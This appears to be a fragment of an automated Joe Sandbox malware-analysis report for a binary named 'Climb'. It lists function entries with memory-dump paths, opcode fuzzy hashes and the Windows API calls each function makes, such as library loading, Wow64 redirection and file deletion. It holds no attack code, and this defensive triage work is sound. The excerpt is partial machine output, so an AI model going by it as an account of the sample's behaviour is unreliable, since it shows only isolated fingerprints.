                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 25f15354a177379dd4e14ba3b17caa539165566c44029354076ee5bc45d8954c
                                                                                                                                                                          • Instruction ID: 159716c2c10475186d8073e2bcac665b98879c5118c8fe8663807666e195810b
                                                                                                                                                                          • Opcode Fuzzy Hash: 25f15354a177379dd4e14ba3b17caa539165566c44029354076ee5bc45d8954c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4151F935A00345AFDB10DF68C840AB97BE5EF85364F19C16AE84A9B392D771ED42CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 0011FCCE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BuffCharLower
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2358735015-0
                                                                                                                                                                          • Opcode ID: cd5dfceb36de1792fab94ddaf5f5f7e90d650b9ff5a26cbf9db0571301d00342
                                                                                                                                                                          • Instruction ID: 436f7d09243b4081e50678cc9ddf79e7b9e1017598e829bd56b8625303220f8e
                                                                                                                                                                          • Opcode Fuzzy Hash: cd5dfceb36de1792fab94ddaf5f5f7e90d650b9ff5a26cbf9db0571301d00342
                                                                                                                                                                          • Instruction Fuzzy Hash: 3141B3B6500209AFCB19EFA8D8819EEB7B8FF44314F21453EE51697251EB70DE86CB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B664A
                                                                                                                                                                            • Part of subcall function 000B663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000B665C
                                                                                                                                                                            • Part of subcall function 000B663E: FreeLibrary.KERNEL32(00000000,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B666E
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B66AB
                                                                                                                                                                            • Part of subcall function 000B6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6610
                                                                                                                                                                            • Part of subcall function 000B6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000B6622
                                                                                                                                                                            • Part of subcall function 000B6607: FreeLibrary.KERNEL32(00000000,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6635
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2632591731-0
                                                                                                                                                                          • Opcode ID: 7693417b33c6fbd86a41ca5d154c44617f3d029d113053de36325ad54fa1afb0
                                                                                                                                                                          • Instruction ID: 77b378e77b063619b57c702dfba809cdff4a591b492e02f90745101f91583699
                                                                                                                                                                          • Opcode Fuzzy Hash: 7693417b33c6fbd86a41ca5d154c44617f3d029d113053de36325ad54fa1afb0
                                                                                                                                                                          • Instruction Fuzzy Hash: E5112376600205AACF24BB20DC02BED7BA19F50701F10442EF552AB1C3EFBBDA04AB60
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __wsopen_s
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3347428461-0
                                                                                                                                                                          • Opcode ID: a700756c5c1eccceecf30c26d477b28ca336e25c30ec4419f42f311c7709e8db
                                                                                                                                                                          • Instruction ID: 6f0e6a88ee2d3985a503734716a054316be1b82e397bca33b71c05126580a617
                                                                                                                                                                          • Opcode Fuzzy Hash: a700756c5c1eccceecf30c26d477b28ca336e25c30ec4419f42f311c7709e8db
                                                                                                                                                                          • Instruction Fuzzy Hash: 01112A7690410AAFCF15DF99E9459DE7BF8EF48310F1180A9F809AB312DA31EA11CB65
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000E4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000E319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000E5031
                                                                                                                                                                          • _free.LIBCMT ref: 000E53DF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                          • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                          • Instruction ID: f1fb883a43db5ba05d7996bae6feb7bd6c948bb27397cf2d1be9f18d2ef12469
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                          • Instruction Fuzzy Hash: A8012B722003446FE3318E66DC4195AFBEDEB85370F25091DE58493281EA7069058764
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                          • Instruction ID: 1d7dd295140756135485b45c048f08b92d089f7159513016a6431d9801d8adb8
                                                                                                                                                                          • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                          • Instruction Fuzzy Hash: F3F0F9325027505AD6713A2BDC117DA72988F42334F104B27F525AB3D3DB70E80186B2
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0012F987
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnvironmentVariable
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1431749950-0
                                                                                                                                                                          • Opcode ID: 250db6f4bd86e00addd41352c5d49cf30c1856f92db05780ad7029da57f4193e
                                                                                                                                                                          • Instruction ID: aac46feac910c87d13e4423dd06a1c738a9b62d8d18f332afbd9e62e53ae1e9c
                                                                                                                                                                          • Opcode Fuzzy Hash: 250db6f4bd86e00addd41352c5d49cf30c1856f92db05780ad7029da57f4193e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF03C76A00214BFCB01EBA5DC46EDE77B8EF99720F004055F5099B362EA70EE81CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000E319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000E5031
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: edfa84e66728a2b7d61b70ccd1608c4b82127234ebd7a136b8c47ec1e436a7b5
                                                                                                                                                                          • Instruction ID: 7ccf958cdf0ca97e840b4da74c69d4e0ee43dc4aaf6e879d3dff8dd5eba2f112
                                                                                                                                                                          • Opcode Fuzzy Hash: edfa84e66728a2b7d61b70ccd1608c4b82127234ebd7a136b8c47ec1e436a7b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0E236611F60AFDB716A67DC05FAA3788AF417F6F158822FC14BB1A1DA30D80186F0
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 5bab2753cf6eb2a53175a2e1e1b5bd028f4058279d0cdb7a26e6320a0ec13cdb
                                                                                                                                                                          • Instruction ID: 555d880e78b264af5d6e7fd7bcb288711c85a5bba45e803212f627b589554196
                                                                                                                                                                          • Opcode Fuzzy Hash: 5bab2753cf6eb2a53175a2e1e1b5bd028f4058279d0cdb7a26e6320a0ec13cdb
                                                                                                                                                                          • Instruction Fuzzy Hash: A1E06531240BA16EDA7126779C09FAA7E88AF417A0F550161EE17B7991DB70CE4085B0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9d7171f0147519ace767953f33a45219aafe3a0aed83f32eead2bf3aec7c3963
                                                                                                                                                                          • Instruction ID: 8fcb6966b4102606a0735c70c257ba97705a68b2e48e6a6bc2bbfbfbfc5bbd4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d7171f0147519ace767953f33a45219aafe3a0aed83f32eead2bf3aec7c3963
                                                                                                                                                                          • Instruction Fuzzy Hash: 93F03071105701CFCB749F64D8A0866B7E4BF1431A314897EE6D687A10C7369840DF50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClearVariant
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1473721057-0
                                                                                                                                                                          • Opcode ID: ab1ab4c39556fd2c9a8fa667a8c981ea54b907d022af5f7996236e777b7c66e2
                                                                                                                                                                          • Instruction ID: 0df0439231a6edfa1a7b2f284b2c231a87b1d59fd419a544de6541cfe61f9c4d
                                                                                                                                                                          • Opcode Fuzzy Hash: ab1ab4c39556fd2c9a8fa667a8c981ea54b907d022af5f7996236e777b7c66e2
                                                                                                                                                                          • Instruction Fuzzy Hash: B2F065B1704205AAD7305BE49805BF9F7E8EB11315F14451ED4D9C31C2DBF654E49761
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __fread_nolock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2638373210-0
                                                                                                                                                                          • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                          • Instruction ID: 2ee723b4fcfe77a4e42e62a63053b96c8ba4bd1f459cb34b850b1c991d3658f1
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF0F87550020DFFDF05DF90C941EAE7BB9FB04318F208545F9159A251C336EA21ABA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 000B3963
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                          • Opcode ID: 66ceb5cdcbfd28a9bae8e406f5d2025ee9674d349c4703b1c1ead35f25cdeb5e
                                                                                                                                                                          • Instruction ID: 6f63f5e1d0cc335e4ed436adfb2146f12a212c69bdd4ec8909659bd9c9715161
                                                                                                                                                                          • Opcode Fuzzy Hash: 66ceb5cdcbfd28a9bae8e406f5d2025ee9674d349c4703b1c1ead35f25cdeb5e
                                                                                                                                                                          • Instruction Fuzzy Hash: 93F037709143149FEB639F24EC467D57BFCB705708F0400A5E64496292D77457C8CF51
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000B3A76
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                          • Opcode ID: c1a91fae158a0a226033f76a96e185aabc1d18c6715d8ef6cc4efb53c426562c
                                                                                                                                                                          • Instruction ID: 7f2ed8da58e5a9f6ff9d1efbb3ceed7d686b000ed49688c39839fed77350e592
                                                                                                                                                                          • Opcode Fuzzy Hash: c1a91fae158a0a226033f76a96e185aabc1d18c6715d8ef6cc4efb53c426562c
                                                                                                                                                                          • Instruction Fuzzy Hash: B3E0CD7690012457CB2193589C05FEA77DDDFC8790F044071FD05D7255DD60DDC0D690
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,000F0A84,?,?,00000000,?,000F0A84,00000000,0000000C), ref: 000F0737
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: d5bb24faa98dc3e7966640d8c1ae7295f9afee37a842e517bc7ea2b0ac321340
                                                                                                                                                                          • Instruction ID: bd585032738f83acc2b1326c67f94bc9f2916be817691c2c3dc899c9fa2c3250
                                                                                                                                                                          • Opcode Fuzzy Hash: d5bb24faa98dc3e7966640d8c1ae7295f9afee37a842e517bc7ea2b0ac321340
                                                                                                                                                                          • Instruction Fuzzy Hash: 40D06C3200010DBBDF029F84ED06EDA3BAAFB48714F014000BE1856020C732E862AB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: 72ba8339dd94cf4a13110c9dcdc2d8f93b26b4feea26658e3398950ce34142d0
                                                                                                                                                                          • Instruction ID: 67de1a7731eb995b349f041878d378a4395ee33136c91a9a329442928a291da9
                                                                                                                                                                          • Opcode Fuzzy Hash: 72ba8339dd94cf4a13110c9dcdc2d8f93b26b4feea26658e3398950ce34142d0
                                                                                                                                                                          • Instruction Fuzzy Hash: FDB0926800060005AD2C0A787A099D933817D433A97DC1BD0E879874F1C37989AFA950
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0011DC54: FindFirstFileW.KERNEL32(?,?), ref: 0011DCCB
                                                                                                                                                                            • Part of subcall function 0011DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0011DD1B
                                                                                                                                                                            • Part of subcall function 0011DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0011DD2C
                                                                                                                                                                            • Part of subcall function 0011DC54: FindClose.KERNEL32(00000000), ref: 0011DD43
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0012666E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
